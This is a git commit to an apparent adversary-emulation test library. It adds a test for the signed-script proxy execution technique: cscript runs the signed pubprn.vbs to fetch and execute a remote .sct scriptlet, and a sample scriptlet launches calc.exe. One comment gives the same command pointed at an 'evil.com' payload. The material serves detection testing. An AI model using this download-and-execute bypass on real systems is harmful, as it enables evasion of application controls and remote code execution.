T1216 Signed Script Proxy Execution (#364)

* T1088 Bypass User Account Control

* Removed a stray character

* T1216 Signed Script Proxy Execution

* Revert "Removed a stray character"

This reverts commit 5ad18700b6239504d9db43942ca90873a18ba8c4.

* Revert "T1088 Bypass User Account Control"

This reverts commit c675c4d91c6a9469734a080841ee622f4b53d856.
This commit is contained in:
Tony M Lambert
2018-10-03 08:57:16 -05:00
committed by Zac Brown
parent 27619d3895
commit f82f953822
2 changed files with 45 additions and 0 deletions
+22
View File
@@ -0,0 +1,22 @@
---
attack_technique: T1216
display_name: Signed Script Proxy Execution
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
description: |
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
supported_platforms:
- windows
input_arguments:
remote_payload:
description: A remote payload to execute using PubPrn.vbs.
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
executor:
name: command_prompt
command: |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
+23
View File
@@ -0,0 +1,23 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:http://evil.com/payload.sct" -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extenstion does not matter -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- You can either execute locally, or from a url -->
<script language="JScript">
<![CDATA[
// calc.exe should launch, this could be any arbitrary code.
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>